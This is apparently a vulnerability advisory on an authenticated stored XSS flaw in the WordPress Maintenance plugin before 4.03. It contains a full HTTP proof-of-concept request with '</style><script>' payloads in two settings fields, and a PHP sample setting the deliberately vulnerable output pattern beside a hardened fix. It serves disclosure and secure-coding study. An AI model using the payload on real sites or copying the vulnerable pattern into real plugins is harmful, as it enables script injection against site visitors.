wpexploit - Emil Kylander - WPEX-ID: 174B2119-B806-4DA4-A23D-C19B552C86CB
Jul 21, 2021

Maintenance < 4.03 - Authenticated Stored XSS


The plugin does not sanitise or escape some of its settings, allowing high-privilege users such as admin to store Cross-Site Scripting payloads in them (even when the unfiltered_html capability is disallowed). The payloads are then output on the frontend maintenance page and executed in the browser of anyone who views it.

POST /wp-admin/admin.php?page=maintenance HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------76761169840134009681200665868
Content-Length: 3726
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="mtnc_nonce"

ba49a734a2
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/wp-admin/admin.php?page=maintenance
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="meta-box-order-nonce"

e668410579
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="closedpostboxesnonce"

5be06a04da
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[state]"

on
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[page_title]"

Site is undergoing maintenance
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[heading]"

Maintenance mode is on
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[description]"

Site will be available soon. Thank you for your patience!
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[footer_text]"

© WP 2021
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[logo_width]"

220
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[logo_height]"


-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[logo]"

0
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[retina_logo]"

0
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[body_bg]"

1143
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[bg_image_portrait]"

0
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[preloader_img]"

0
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[body_bg_color]"

#111111
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[font_color]"

#ffffff
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[controls_bg_color]"

</style><script>alert(/XSS-controls_bg_color/);</script>
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[body_font_family]"

Open Sans
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[body_font_subset]"

300
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[gg_analytics_id]"


-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[blur_intensity]"

5
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[is_login]"

1
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="submit"

Save Changes
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[custom_css]"

</style><script>alert(/XSS-Custom-CSS/);</script>
-----------------------------76761169840134009681200665868--


Then, with maintenance mode enabled (lib_options[state]=on as in the request above), load the site's homepage: the values saved in lib_options[controls_bg_color] and lib_options[custom_css] are emitted unescaped, so the leading </style> in each payload breaks out of the plugin's inline stylesheet and the script executes.
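Added example (not the plugin's own code) of the bug class behind this advisory and the fix a WordPress plugin author would apply: an option value echoed raw into a <style> block, beside a version that validates colour fields with sanitize_hex_color, strips markup from the custom CSS, and escapes free text on output. The function names (mtnc_render_styles_*, mtnc_sanitize_options) and the option group name 'maintenance_options' are hypothetical; the field names are the ones from the request above.

```php
<?php
// Hypothetical illustration of the "Maintenance < 4.03" bug class (added example, not the plugin's code).
// $opts is the lib_options array saved from the admin form and echoed into the maintenance page.

// --- Vulnerable pattern: option values interpolated straight into a <style> block. ---
function mtnc_render_styles_vulnerable( array $opts ) {
    // A value such as '</style><script>alert(1)</script>' in controls_bg_color or custom_css
    // closes the style element early and the browser runs the script.
    return '<style>'
        . '.controls { background: ' . $opts['controls_bg_color'] . '; }'
        . $opts['custom_css']
        . '</style>';
}

// --- Hardened pattern: validate on save, and never emit raw option text into HTML. ---
function mtnc_sanitize_options( $input ) {
    $clean = array();

    // Colour fields: accept only #rgb / #rrggbb; anything else is stored as an empty string.
    foreach ( array( 'body_bg_color', 'font_color', 'controls_bg_color' ) as $key ) {
        $clean[ $key ] = isset( $input[ $key ] ) ? (string) sanitize_hex_color( $input[ $key ] ) : '';
    }

    // Custom CSS: strip all tags so a stray '</style>' cannot terminate the style element.
    $clean['custom_css'] = isset( $input['custom_css'] ) ? wp_strip_all_tags( $input['custom_css'] ) : '';

    // Free-text fields: normalise on save, and still escape on output (see below).
    foreach ( array( 'page_title', 'heading', 'description', 'footer_text' ) as $key ) {
        $clean[ $key ] = isset( $input[ $key ] ) ? sanitize_text_field( $input[ $key ] ) : '';
    }

    $clean['state'] = ! empty( $input['state'] ) ? 1 : 0;
    return $clean;
}

function mtnc_render_styles_hardened( array $opts ) {
    // Re-validate at output time as well: stored data may predate the sanitizer.
    $color = sanitize_hex_color( $opts['controls_bg_color'] );
    $css   = wp_strip_all_tags( $opts['custom_css'] );
    return '<style>'
        . '.controls { background: ' . ( $color ? $color : 'transparent' ) . '; }'
        . $css
        . '</style>';
}

function mtnc_render_heading_hardened( array $opts ) {
    // Text placed in HTML content is escaped for the HTML context it lands in.
    return '<h1>' . esc_html( $opts['heading'] ) . '</h1>';
}

// Register the sanitizer so WordPress runs it on every save of lib_options. It executes
// server-side regardless of the saving user's role, so unfiltered_html does not bypass it.
add_action( 'admin_init', function () {
    register_setting( 'maintenance_options', 'lib_options', array(   // option group name is assumed
        'type'              => 'array',
        'sanitize_callback' => 'mtnc_sanitize_options',
    ) );
} );
```

The important design point is that sanitisation is tied to the option itself (sanitize_callback) and repeated at output, rather than relying on the caller's capabilities or on the admin form's JavaScript. For the CSS field, a stricter alternative is to reject any markup outright, as WordPress core's customizer CSS setting does (it refuses values matching `</?\w+` with "Markup is not allowed in CSS"), instead of silently stripping it.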